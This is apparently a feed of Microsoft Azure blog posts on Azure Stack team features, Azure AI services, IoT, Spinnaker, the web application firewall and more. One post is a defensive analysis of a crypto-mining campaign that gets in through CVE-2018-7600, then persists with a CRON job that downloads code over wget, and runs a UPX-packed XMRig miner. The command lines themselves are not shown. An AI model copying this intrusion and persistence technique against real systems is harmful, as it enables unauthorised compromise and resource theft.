Azure Stack IaaS – part seven

It takes a team

Most apps get delivered by a team. When your team delivers the app through virtual machine (VMs), it is important to coordinate efforts. Born in the cloud to serve teams from all over the world, Azure and Azure Stack have some handy capabilities to help you coordinate VM operations across your team.

Identity and single sign-on

The easiest identity to remember is the one you use every day to sign in to your corporate network and check your email. If you are using Azure Active Directory, or your own active directory, your login to Azure Stack will be the same. This is something your admin sets up when the Azure Stack was deployed so you don’t have to learn and remember different credentials.

Learn more about integrating Azure Stack with Azure Active Directory and Active Directory Federation Services (ADFS).

Role-based access control

In the virtualization days my team typically coordinated operations through credentials to VMs and the management tools. The Azure Resource Manager include a very robust role-based access control (RBAC) system that not only allows you to identify who can access the system, but allows you to assign people to roles and set a scope of control to define what they are allowed to do to what.

More than just people in my organization

When you work in the cloud, you may need to collaborate with people from other organizations. As more and more things become automated, you might have to give a process, not a person, access to a resource. Azure and Azure Stack have you covered. The image below shows a VM where I have given access both to three applications (service principals) and a user from an external domain (foreign principal). 

Service principal

When an application needs access to deploy or configure VMs, or other resource in your Azure Stack, you can create a service principal which is a credential for the application. You can then delegate only the necessary permissions to that service principal.

As an example, you may have a configuration management tool that inventories VMs in your subscription. In this scenario, you can create a service principal, grant the reader role to that service principal, and limit the configuration management tool to read-only access.

Learn more about service principals in Azure Stack.

Foreign principal

A foreign principal is the identity of a person that is managed by another authority. For example, the team at Contoso.com might need to allow access to a VM for a contractor or a partner from Fabrikam.com. In the virtualization days we would create a user account in our domain for that user, but that was a management headache. With Azure and Azure Stack you can allow users that sign in with their corporate credentials to access your VMs.

Learn how to enable multi-tenancy in Azure Stack.

Activity logs

When your VM runs around the clock, you will have teams in at all times of the day. Fortunately, Azure and Azure Stack include an activity log that allows to track all changes that have been made to the VM and who initiated the action.

Learn more about Azure Activity Logs.

Locks

Sometimes people make errors, like deleting a production VM by mistake. A nice feature you will find in Azure and Azure Stack is the “lock.” A lock can be used to prevent any change or deletion on a VM or any other resource. When attempted, the user will get an error message until they manually remove the lock.

Learn more about locking VMs and other Azure resources.

Tags

The best place to store additional data about your VM is in the tool you manage the VM from. Azure and Azure Stack provide you that ability to add additional information about your VM through the Tags feature. You can use Tags to help your team keep track of the deployment environment, support contacts, cost center, or anything else important. You can even search for these tags in the portal to find the right resources quickly.

Learn more about tagging VMs and other Azure resources.

Work as a team, not individuals

The team features in Azure and Azure Stack allows your team to elevate its game to deliver the best virtual machine operations. Managing an Infrastructure-as-a-Service (IaaS) VM is more than stop, start, and login. The Azure platform powering Azure Stack IaaS allows you to organize, delegate, and track your team’s operations so you can deliver a better experience to your users.

In this blog series

We hope you come back to read future posts in this blog series. Here are some of our past and upcoming topics:

Azure Stack at its core is an Infrastructure-as-a-Service (IaaS) platform
Start with what you already have
Protect your stuff
Pay for what you use
Fundamentals of IaaS
Do it yourself
If you do it often, automate it
Build on the success of others
Journey to PaaS

Quelle: Azure

Azure AI does that?

Five examples of how Azure AI is driving innovation

Whether you’re just starting off in tech, building, managing, or deploying apps, gathering and analyzing data, or solving global issues —anyone can benefit from using cloud technology. Below we’ve gathered five cool examples of innovative artificial intelligence (AI) to showcase how you can be a catalyst for real change.

Facial recognition

You know that old box of photos you have sitting in the attic collecting cobwebs; the one with those beautifully embarrassing childhood photos half-covered by a misplaced thumb? How grateful would your family be if you could bring those back to life digitally, at the tip of your fingers? Manually scanning and downloading photos to all your devices would be a huge pain. And if those photos don’t have dates or the names of the people in them written on the back — forget it! But with AI algorithms, cognitive services, and facial recognition processes, organizing these photos by groups is super simple.

By utilizing Azure’s Face API, facial recognition algorithms can quickly and accurately detect, verify, identify, and analyze faces. They can provide facial matching, facial attributes, and characteristic analysis in order to organize people and facial definitions into groups of similar faces.

Handwriting analysis

Already spent hours manually sorting through those old photos? Not to worry, another helpful tool in the Computer Vision API is the ability to take the papers and handwritten notes you’ve compiled throughout your last project and create a cohesive document. No longer will you need to decipher those scribbles from your teammates and scratch your head whether that obscure symbol is a four or a “u.”

With Computer Vision API’s Recognizing Handwritten Text interface, you can conveniently take photos of handwritten notes, forms, whiteboards, sticky notes, that napkin you found, and anything in between. Rather than manually transcribing them, you can turn these documents into digital notes that are easy to comb through with a simple search. The interface can detect, extract, and digitally reproduce any type of handwriting—even Medieval Klingon! Imagine all the time and paper you will save!

Text analysis

A close cousin of the Handwriting API, the Text Analytics API allows for some pretty neat text analysis as well. Search through hundreds of documents, comb through customer reviews, tweets, and comments, and automatically identify posts for positive or negative sentiment by inputting just a few parameters. The API can also detect up to 120 different languages and identify things like if “times” refers to The New York Times or Times Square. Pretty cool, right?

Translate languages

Speaking of detecting different languages, the Translator Text API allows you to communicate with your colleagues from all over the map better than ever before. Start typing “Hello, it’s nice to meet you” into your app and the API can translate you and your colleagues’ entire conversation.

The Translator Text API can show text in different alphabets, translate Chinese characters to PinYin, display any of the supported transliteration languages in the Latin alphabet, and even show words written in the Latin alphabet in non-Latin characters such as Japanese, Hindi, or Arabic, all with some simple code. The API can be integrated into your apps, websites, tools, and solutions and allows you to add multi-language user experiences in more than 60 languages. This API is used by companies, like eBay, worldwide for website localization, e-commerce, customer support, messaging applications, bots, and more to provide quick and automatic translations for all their worldly customers.

Translator Text can also translate languages in real time through video/audio input so you can seamlessly communicate with colleagues around the world via video chat. It even converts video to written text, which makes content accessible for those who are hearing or visually impaired.

AI for Good

While all these services are great for automating business and personal projects, they can be used for much more. Last fall, Microsoft announced AI for Humanitarian Action: a new $40 million, five-year program that uses the power of AI to help the world recover from disasters, address the needs of children, protect refugees and displaced people, and promote respect for human rights. Part of this initiative is the AI for Good Suite, a five-year commitment to solve society’s biggest challenges using AI fundamentals.

One of those challenges is being addressed by long-time Microsoft partner Operation Smile, a nonprofit dedicated to repairing cleft lips and palates across the globe. Through the use of machine vision AI and facial modeling, surgeons can compare pre- and post-surgery outcomes, rank the most optimal repairs, and provide that data back to Operation Smile. From there, the organization can identify their top-performing surgeons and enable them to teach others how to improve their cleft repair techniques through videos that can be accessed around the globe.

Operation Smile is supercharging their doctors’ talents with technology to increase quality of life throughout the world. By utilizing AI, Operation Smile can help more children than ever before!

With AI, the sky is the limit. And who knows—you just might discover the next best innovation in AI technology.

Learn more

Learn more about what you can do with Cognitive Services

Get certified as an Azure AI Engineer
Quelle: Azure

Azure Security Center exposes crypto miner campaign

Azure Security Center discovered a new cryptocurrency mining operation on Azure customer resources.
This operation takes advantage of an old version of known open source CMS, with a known RCE vulnerability (CVE-2018-7600) as the entry point, and then after using the CRON utility for persistency, it mines “Monero” cryptocurrency using a new compiled binary of the “XMRig” open-source crypto mining tool.

Azure Security Center (ASC) spotted the attack in real-time, and alerted the affected customer with the following alerts:

Suspicious file download – Possible malicious file download using wget detected
Suspicious CRON job – Possible suspicious scheduling tasks access detected
Suspicious activity – ASC detected periodic file downloads and execution from the suspicious source
Process executed from suspicious location

The entry point

Following the traces the attacker left behind, we were able to track the entry point of this malware and conclude it was originated by leveraging a remote code execution vulnerability of a known open source CMS – CVE-2018-7600.

This vulnerability is exposed in an older version of this CMS and is estimated to impact a large number of websites that are using out of date versions. The cause of this vulnerability is insufficient input validation within an API call.

The first suspicious command line we noticed on the effected Linux machines was:

Decoding the base64 part of the command line reveals a logic of download and execution of a bash script file periodically, using the CRON utility:

The URL path also includes reference to the CMS name – another indication for the entry point (and for a sloppy attacker as well).

We also learned, from the telemetries collected from the harmed machines, that this first command line executes within “apache” user context, and within the relative CMS working directory.

We did an examination on the affected resources and discovered that all of them were running with an unpatched version of the relative CMS, which is exposed to a highly critical security risk that allows an attacker to run malicious code on the exposed resource.

Malware analysis

The malware uses the CRON utility (Unix job scheduler) for persistency by adding the following line to the CRON table file:

This results with the download and execution of a bash script file at every minute and allows the attacker to command and control using bash scripts.

The bash file (as we captured it in this time) downloads the binary file and executes it (As seen in the image above).
The binary check if the machine is already compromised, and downloads using the HTTP 1.1 POST method, or another binary file depending on the number of processors the machine has.

On first sight, the second binary seems to be more difficult to investigate since it’s clearly obfuscated. Luckily, the attacker chose to use UPX packer which focuses on compression and not on obfuscation.

After de-packing the binary, we found a compilation of the open-source cryptocurrency miner “XMRig” in version 2.6.3. The miner compiles with the configuration inside it, and pulls the mining jobs from the mining proxy server, therefore we were unable to estimate the number of clients and earnings of the attacker.

The big picture

By analyzing the behavior of several crypto miners, we have noticed 2 strong indicators for crypto miner driven attacks:

1. Killing competitors – Many crypto-attacks assume that the machine is already compromised, and try to kill other computing power competitors. It does this by observing the process list, focusing on:

Process name – From popular open source miners to less known mining campaigns
Command line arguments such as known pool domains, crypto hash algorithms, mining protocol, etc.
CPU usage consumption

Another common method we identified is to reset the CRON tab – which in many cases is in use as a persistence method for other compute power competitors.

2. Mining pools ­- Crypto mining jobs are being managed by the mining pool, which is responsible for gathering multiple clients to contribute and share the revenue across the clients. Most of the attackers use public mining pools which are simple to deploy and use, but once the attacker is exposed, his account might be blocked. Lately we noticed an increasing number of cases where attackers used their own proxy mining server. This technique helps the attacker stay anonymous, both from detection by a security product within the host (such as Azure Security Center Threat detection for Linux) and from detection by the public mining pool.

Conclusion and prevention

Preventing this attack is as easy as installing the latest security updates. A preferred option might be using SaaS (Software as a service) instead of maintaining a full web server and software environment.

Crypto-miner activity is easy to detect most of the time since it consumes significant resources.
Using a cloud security solution such as Azure Security Center, will continuously monitor the security of your machines, networks, and Azure services and will alert you when unusual activity is detected.
Quelle: Azure

Leveraging AI and digital twins to transform manufacturing with Sight Machine

In the world of manufacturing, the Industrial Internet of Things (IIoT) has come, and that means data. A lot of data. Smart machines, equipped with sensors, add to the large quantity of data already generated from quality systems, MES, ERP and other production systems. All this data is being gathered in different formats and at different cadences making it nearly impossible to use—or to deliver business insights. Azure has mastered ingesting and storing manufacturing data with services such as Azure IoT Hub and Azure Data Lake, and now our partner Sight Machine has solved for the other huge challenge: data variety. Sight Machine on Azure is a leading AI-enabled analytics platform that enables manufacturers to normalize and contextualize plant floor data in real-time. The creation of these digital twins allows them to find new insights, transform operations, and unlock new value.

Data in the pre-digital world

Manufacturers are aware of the untapped potential of production data. Global manufacturers have begun investing in on-premises solutions for capturing and storing factory floor data. But these pre-digital world methods have many disadvantages. They result in siloed data, uncontextualized data (raw machine data with no connection to actual production processes), and limited accessibility (engineers and specialists are required to access and manipulate the data). Most importantly, this data is only accessed in a reactive manner: it does not reflect real-time conditions. It can’t be used to address quality and productivity issues as they occur, or to predict conditions that might impact output.

Cloud-based manufacturing intelligence

Sight Machine’s Digital Manufacturing Platform—built on Azure—harnesses artificial intelligence, machine learning and advanced analytics. It can continuously ingest and transform enormous quantities of production data into actionable insight; such as identifying vulnerabilities in quality and productivity throughout the enterprise. The approach is illustrated in this graphic.

Sight Machine’s platform leverages the IoT capabilities of Azure to ingest data from machines (PLCs and machine data). Azure IoT Hub and Azure Stream Analytics process the data in real-time and store it in Azure Blob Storage. Sight Machine’s AI Data Pipeline dynamically integrates this data with other production sources. These sources can include ERP data from Dynamics AX, analyses generated by Azure’s Machine Learning Service and HDInsight stored in Azure’s Data Lake. By combining all this data, Sight Machine creates a digital twin of the entire production process. Their analytics and visualization tools leverage this digital twin to deliver real-time information to the user. Integration with Azure Active Directory ensures the right engineers can access the right data and analysis tools.

Digital twins = one source of truth

Somewhat contrary to the notion of “twins,” digital twins result in one source of truth—at least in the world of data. The idea is simple: take data from disparate sources and locations—then combine the information in the cloud into digital representations of every machine, line, part, and process. Once a digital twin has been created, it can be stored, managed, analyzed, and presented.

Sight Machine creates digital twins that represent every manufacturing machine, line, facility, supplier, part, batch, and process. Sight Machine’s AI Data Pipeline automates the process of blending and transforming streaming data into fundamental units of analysis, purpose-built for manufacturing. This approach combines edge compute, cloud automation, and management with AI. The benefits include classifying, mapping, data transformation, and unified data models that are configurable for every manufacturing environment.

Recommended next steps

To learn more about the company, go to the Sight Machine website. To try out the service, go to the Azure Marketplace listing and click Contact me.
Quelle: Azure

Introducing the App Service Migration Assistant for ASP.NET applications

This blog post was co-authored by Nitasha Verma, Principal Group Enginnering Manager, Azure App Service.

In June 2018, we released the App Service Migration Assessment Tool. The Assessment Tool was designed to help customers quickly and easily assess whether a site could be moved to Azure App Service by scanning an externally accessible (HTTP) endpoint. Today we’re pleased to announce the release of an updated version, the App Service Migration Assistant! The new version helps customers and partners move sites identified by the assessment tool by quickly and easily migrating ASP.Net sites to App Service. 

The App Service Migration Assistant is designed to simplify your journey to the cloud through a free, simple, and fast solution to migrate ASP.Net applications from on-premises to the cloud. You can quickly:

Assess whether your app is a good candidate for migration by running a scan of its public URL.
Download the Migration Assistant to begin your migration.
Use the tool to run readiness checks and general assessment of your app’s configuration settings, then migrate your app or site to Azure App Service via the tool.

Keep reading to learn more about the tool or start your migration now.​

Getting started

Download the App Service Migration Assistant. This tool works with ASP.Net version 7.0 and above and will migrate site content and configuration to your Azure App Service subscription using either a new or existing App Service Plan.

How the tool works

The Migration Assistant tool is a local agent that performs a detailed assessment and then walks you through the migration process. The tool performs readiness checks as well as a general assessment of the web app’s configuration settings.

Once the application has received a successful assessment, the tool will walk you through the process of authenticating with your Azure subscription and then prompt you to provide details on the target account and App Service plan along with other configuration details for the newly migrated site.

The Migration Assistant tool will then move your site to the target App Service plan while also configuring Hybrid Connections, should that option be selected.

Database migration and Hybrid Connections

Our Migration Assistant is designed to migrate the web application and associated configurations, but it does not migrate the database. There are two options for your database:

Use the SQL Migration Tool
Leave your database on-premises and connect to it from the cloud using Hybrid Connections

When used with App Service, Hybrid Connections allows you to securely access application resources in other networks – in this case an on-premises SQL database. The migration tool configures and sets up Hybrid Connections for you, allowing you to migrate your site while keeping your database on-premises to be migrated at your leisure.

Supported configurations

The tool should migrate most modern ASP.Net applications, but there are some configurations that are not supported. These include:

IIS version less than 7.0
Dependence on ISAPI filters
Dependence on ISAPI extensions
Bindings that are not HTTP or HTTPS
Endpoints that are not port 80 for HTTP, or port 443 for HTTPS
Authentication schemes other than anonymous
Dependencies on applicationhost.config settings made with a location tag
Applications that use more than one application pool
Use of an application pool that uses a custom account
URL Rewrite rules that depend on global settings
Web farms – specifically shared configuration

You can find more details on the what the tool supports, as well as workarounds for some unsupported sites on the documentation page.

You can also find more details on App Service migrations on the App Service Migration checklist.

What’s next

We plan to continue adding functionally to the tool in the coming months. With the most immediate priority being additional ASP.NET scenarios and support for additional web frameworks, such as Java and PHP.

If you have any feedback on the tool or would like to suggest improvements, please submit your feature requests on our GitHub page.
Quelle: Azure

Hybrid storage performance comes to Azure

When it comes to adding a performance tier between compute and file storage, Avere Systems has led the way with its high-performance caching appliance known as the Avere FXT Edge Filer. This week at NAB, attendees will get a first look at the new Azure FXT Edge Filer, now with even more performance, memory, SSD, and support for Azure Blob. Since Microsoft’s acquisition of Avere last March, we’ve been working to provide an exciting combination of performance and efficiency to support hybrid storage architectures with the Avere appliance technology.

Linux performance over NFS

Microsoft is committed to meeting our customers where we’re needed. The launch of the new Azure FXT Edge Filer is yet another example of this as we deliver high-throughput and low-latency NFS to applications running on Linux compute farms. The Azure FXT Edge Filer solves latency issues between Blob storage and on-premises computing with built-in translation from NFS to Blob. It sits at the edge of your hybrid storage environment closest to on-premises compute, caching the active data to reduce bottlenecks. Let’s look at common applications:

Active Archives in Azure Blob – When Azure Blob is a target storage location for aging, but not yet cold data, the Azure FXT Edge Filer accelerates access to files by creating an on-premises cache of active data.

WAN Caching – Latency across wide area networks (WANs) can slow productivity. The Azure FXT Edge Filer caches active data closest to the users and hides that latency as they reach for data stored in data centers or colos. Remote office engineers, artists, and other power users achieve fast access to files they need, and meanwhile backup, mirroring, and other data protection activities run seamlessly in the core data center.

NAS Optimization – Many high-performance computing environments have large NetApp or Dell EMC Isilon network-attached storage (NAS) arrays. When demand is at its peak, these storage systems can become bottlenecks. The Azure FXT Edge Filer optimizes these NAS systems by caching data closest to the compute, separating performance from capacity and better delivering both.

When datasets are large, hybrid file-storage caching provides performance and flexibility that are needed to keep core operations productive.

Azure FXT Edge Filer model specifications

We are currently previewing the FXT 6600 model at customer sites, with a second FXT 6400 model becoming available with general availability. The FXT 6600 is an impressive top-end model with 40 percent more read performance and double the memory of the FXT 5850. The FXT 6400 is a great mid-range model for customers who don’t need as much memory and SSD capacity or are looking to upgrade FXT 5600 and FXT 5400 models at an affordable price.

Azure FXT Edge Filer – 6600 Model
Azure FXT Edge Filer – 6400 Model

Highest performance, largest cache
High-performance, large cache

Specifications per node:
Specifications per note:

1536 GB DRAM
768 GB DRAM

25.6 TB SSD
12.8 TB SSD

6×25/10Gb + 2x1Gb Network Ports
6×25/10Gb + 2x1Gb Network Ports

Minimum 3-node cluster
Minimum 3-node cluster

Uses 256 AES encryption
Uses 256 AES encryption

Key features

Scalable to 24 FXT server nodes as demand grows
High-performance DRAM/memory for faster access to active data and large SSD cache sizes to support big data workloads
Single mountpoint provides simplified management across heterogeneous storage
Hybrid architecture – NFSv3, SMB2 to clients and applications; support for NetApp, Dell EMC Isilon, Azure Blob, and S3 storage

The Azure FXT Edge Filer is a combination of hardware provided by Dell EMC and software provided by Microsoft. For ease, a complete solution will be delivered to customers as a software-plus-hardware appliance through a system integrator. If you are interested in learning more about adding the Azure FXT Edge Filer to your on-premises infrastructure or about upgrading existing Avere hardware, you can reach out to the team now. Otherwise, watch for update on the Azure FXT Edge Filer homepage. 

Azure FXT Edge Filer for render farms

High-performance file access for render farms and artists is key to meeting important deadlines and building efficiencies into post-production pipelines. At NAB 2019 in Las Vegas, visit the Microsoft Azure booth #SL6716 to learn more about the new Azure FXT Edge Filer for rendering. You’ll find technology experts, presentations, and support materials to help you render faster with Azure.

Resources

Visit the Azure FXT Edge Filer homepage. 
Get started by reading the Azure FXT documentation.
To learn more about Microsoft’s acquisition of Avere Systems, refer to the blog post, “Microsoft to acquire Avere Systems, accelerating high-performance computing innovation for media and entertainment industry and beyond.”
Lear more about Avere vFXT for Azure.

Quelle: Azure

Expanding Azure IoT certification service to support Azure IoT Edge devices

In December 2018, Microsoft launched the Azure IoT certification service, a web-based test automation workflow to streamline the certification process through self-serve tools. Azure IoT certification service (AICS) was designed to reduce the operational processes and engineering costs for hardware manufacturers to get their devices certified for Azure Certified for IoT program and be showcased on the Azure IoT device catalog.

The initial version of AICS focused on IoT device certification. Today, we are taking steps to expand the service to now also support Azure IoT Edge Device certification. Azure IoT Edge device is a device which comprised of three key components: IoT Edge modules, IoT Edge runtime and a cloud-based interface. Learn more about these three components in this blog explaining IoT Edge.

What it means to certify as Azure IoT Edge device is that the certification program validates the functionality of three key components described above. The certification program also ensures that the identity of a device is protected through validation of security components. You can review specific technical requirements for Azure IoT Edge device certification.

This expansion of AICS capabilities builds on the related expansion of the Azure Certified for IoT program to support Azure IoT Edge devices which was announced in June 2018. Since then, certified Azure IoT Edge device ecosystem has grown rapidly with additional operating system support such as Windows IoT and Edge module ecosystem which allows any partners to build containerized app to deploy modules to a range of Azure IoT Edge devices. You can also see all the certified Azure Edge IoT devices here.

With the web-based test workflow now updated to also certify Edge devices, AICS not only helps improve the overall quality of IoT deployments but also simplifies the certification processes for device manufacturers. From now on, all device manufacturers are required to run AICS to complete the certification process. To learn more about AICS and see a demo of it in action, please refer to this episode of the IoT Show on Channel 9.

Ecosystem partners have endorsed this strategy and approach as well.  One partner who recently used the tool provided this comment:

Azure IoT certification service” (AICS) simplifies the validation process for Azure IoT Edge device certification and increase our quality with consistency for Azure IoT Edge devices.

–Tomoyasu Suzuki, President of Plat'Home Co., Ltd

Azure IoT Edge flow within AICS

The workflow and user experience for Azure IoT Edge device is similar to the IoT device certification workflow. You will need to select the device’s OS, prepare your device to register to specified IoT Hub instances, and then start running. Step by step instructions are provided in this certification documentation.

There are three key differences for Azure IoT Edge from IoT device certification flow:

“Edge certified” checkbox needs to be checked to invoke the AICS workflow for Azure IoT Edge

To start AICS for Azure IoT Edge devices, first you need to ensure that you select “Edge Certified” checkbox under Azure IoT Edge section in the first page of device registration process when submitting a device for certification.

Automated tests are different. AICS workflow for IoT devices validate for IoT Hub primitives like device-to-cloud, cloud-to-device, direct method and device twin properties. AICS workflow for IoT Edge device validate the presence of EdgeAgent module on the device, and also test to ensure that a sample Edge module is successfully deployed to the device.

To learn more about this process please see our blog on streamlined IoT device certification.

Upon submission, AICS will inform the Microsoft team to follow up with you and provide guidance to package and ship the physical device to the Microsoft team. This step is not necessary for IoT device certification process. The confirmation dialog is shown below.

AICS makes the certification process easy and intuitive. We hope every device manufacturers to submit your devices for certification.

Next steps

Go to Partner Dashboard to start your submission.

If you have any questions, please contact Azure Certified for IoT.
Quelle: Azure

Spinnaker continuous delivery platform now with support for Azure

Spinnaker is an open source, multi-cloud continuous delivery platform for releasing software changes with high velocity and confidence. It is being chosen by a growing number of enterprises as the open source continuous deployment platform used to modernize their application deployments. Most of these enterprises deploy applications to multiple clouds. One of Spinnaker’s features is its ability to allow users to deploy applications to different clouds using best practices and proven deployment strategies.

Until now customers who had standardized on Spinnaker had to use custom/different tooling to deploy their applications to Azure.

With this blog post and the recent release of Spinnaker (1.13), we are excited to announce that Microsoft has worked with the core Spinnaker team to ensure Azure deployments are integrated into Spinnaker!

These integrations will strengthen our existing open source CI/CD pipeline toolchain and allow customers who have taken a dependency on Spinnaker.

Initial release (1.13)

 

In our initial release we have enabled a core Spinnaker scenario for deploying immutable VM images – the Build, Bake, Deploy scenario.

As the scenario name suggests, there are three primary stages in the Spinnaker pipeline.

Build (labeled “Configuration” above): The build stage happens outside of Spinnaker and is used as a trigger for the following stages. It can be a Jenkins job, Travis job, or Webhook, and generates a package that will be used to create a VM image.
Bake: This stage uses the package from the previous step to create an Azure managed VM image.
Deploy: Finally, the deploy stage deploys one or more Virtual Machine Scales Sets using the managed VM image from the previous step. This can be done using one of the built-in strategies like Highlander or Red/Black.

Since Spinnaker is used to deploy to multiple clouds, it has created some abstractions for common infrastructure components. In this release these abstractions map to Azure infrastructure as follows:

Server Group: Maps to an Azure Virtual Machine Scale Set
Load balancer: Maps to an Azure Application Gateway
Firewall: Maps to an Azure Network Security Group

What’s next?

We are excited to be accepted as part of the Spinnaker open source community and will continue to invest in Spinnaker to enable other scenarios like container-based Azure Kubernetes Service (AKS) deployments, improve performance, and flexibility in infrastructure abstractions. We will publish our roadmap so keep an eye out and let us know what you think.

If you are interested in learning more about Spinnaker, or it’s already an important component in your DevOps and you would like to help us make the integration with Azure great, please reach out to us. You can connect directly with us in any of the following venues:

Join the conversation on the Azure channel in Spinnaker Slack.
Create issues and/or contribute on GitHub.

Quelle: Azure

Device template library in IoT Central

With the new addition of a device template library into our Device Templates page, we are making it easier than ever to onboard and model your devices. Now, when you get started with creating a new template, you can choose between building one from scratch or you can quickly select from a library of existing device templates. Today you’ll be able to choose from our MXChip, Raspberry Pi, or Windows 10 IoT Core templates. We will be working to improve this library by adding more device templates which provide customer value.

The addition of the device template library helps to streamline the device modeling workflow. It saves time as you can pre-populate a model with existing details. This now opens the door for more manufacturers to create standard definitions for their devices or smart products which we’ll continue to include in this growing template library.

To get started with selecting a device template, select the Device Templates tab and click the “+ New” button. This will bring you to our library page where you can choose which template you’d like to get quickly started with. You can also choose the Custom option if you would like to begin modeling your device template from scratch.

Once you select a template, simply give it a name and click “Create” to add this template into your application. We will automatically create a simulated device for you to view simulated data coming into this new template. Once your template has been created, you can visit the “Device Explorer” page to connect other real or simulated devices into this template.

We are excited to continue simplifying your device onboarding experience. If there are particular device templates you want to use or if you have any other suggestions, please leave us feedback with the links below.

Next steps

Have ideas or suggestions for new features? Post it on UserVoice.
To explore the full set of features and capabilities and start your free trial, visit the IoT Central website.
Check out our documentation including tutorials to connect your first device.
To give us feedback about your experience with Azure IoT Central, take this survey.
To learn more about the Azure IoT portfolio including the latest news, visit the Microsoft Azure IoT page.

Quelle: Azure

Web application firewall at Azure Front Door service

You have a great web application, and users from all over the world love it. Well, so do malicious attackers. Cyber-attacks grow each year in frequency and sophistication, and being unprotected against them exposes you to the risks of service interruptions, data loss, and tarnished reputation.

We have heard from many of you that security is a top priority when moving web applications onto the cloud. Today, we are very excited to announce our public preview of the Web Application Firewall (WAF) for the Azure Front Door service.  By combining the global application and content delivery network with natively integrated WAF engine, we now offer a highly available platform helping you deliver your web applications to the world, secure and fast!

WAF with Front Door service leverages the scale of and the deep security investments we have made at the Azure edge, and it is designed to protect you from multiple attack vectors such as injection type attacks and volumetric DoS attacks. It inspects each incoming request at Azure’s network edge, stops unwanted traffic before they enter your backend servers, and offers protection at scale without sacrificing on performance. With WAF for Front Door, you have the option to fine tune access to your web application using custom rules that you define, as well as to enable a collection of security rules against common web application vulnerabilities packaged as Managed Rulesets. Furthermore, when you use WAF at Front Door, your security policy management is centralized and any changes you make are instantaneously propagated to all the Front Door edges.

A WAF policy is the building unit of WAF which defines the security posture for your web application. It can have two types of security rules: custom rules and a set of pre-configured rule groups known as a Managed Ruleset. Azure managed Default Rule Set is updated by Azure as needed to adapt to new attack signatures. If you have a cloud native, Internet-facing web application such as a web app hosted on Azure PaaS platform it is very simple to add Front Door with default WAF policy. Just a few clicks away, your web application is protected from common OWASP TOP 10 exploitations and with latency optimization offered by Front Door service.

Figure 1 Protecting your Web App with WAF at Front Door

If you are like many of our customers who have compliance and BCDR requirements for your business-critical applications, you probably have your web applications hosted in multiple regions. WAF with Front Door offers centralized policy management and global load balancing supporting many routing options to your backends.

Figure 2 Protecting your multi-region web application with WAF at Front Door

WAF with Front Door can protect backends hosted on Azure as well as these that are hosted on other clouds or on Premise. You may further lock down your backends to allow only traffic from Front Door and deny direct access from the Internet. WAF at Front Door allows granular access and rate control via custom rules. You may create custom rules along the following dimensions:

IP allow list and block list: control access to your web applications based on list of client IP addresses or IP address ranges. Both IPv4 and IPv6 are supported.
Geographic based access control: control access to your web applications based on a client’s country code.
HTTP parameters-based access control: control access to your web applications based on string matching of HTTP(S) request parameters such as query string, post args, request Uri, request header, and request body.
Request method-based access control: control access to your web applications based on HTTP request method such as Get, Put, and Head.
Size constraint: control access to your web applications based on the lengths of specific parts of a request such as query string, Uri, or request body.
Rate limiting rules: A rate control rule is to limit abnormal high traffic from any client IP. You may set a threshold on number of web requests allowed by a client IP during a one-minute duration. Rate can be combined with match conditions, for example, rate limit access to a specific Uri path.

WAF charges based on the number of WAF policies and rules you create, types of managed rule set you choose, and the number of web requests that you receive. During public preview, WAF at Front Door is free of charge.

As we continue to enhance Azure WAF offering, would love to hear your feedback. You can try Web Application Firewall with Front Door today using portal, ARM templates, or PowerShell. For more information, visit the detailed documentation for Web Application Firewall (WAF) for the Azure Front Door service.
Quelle: Azure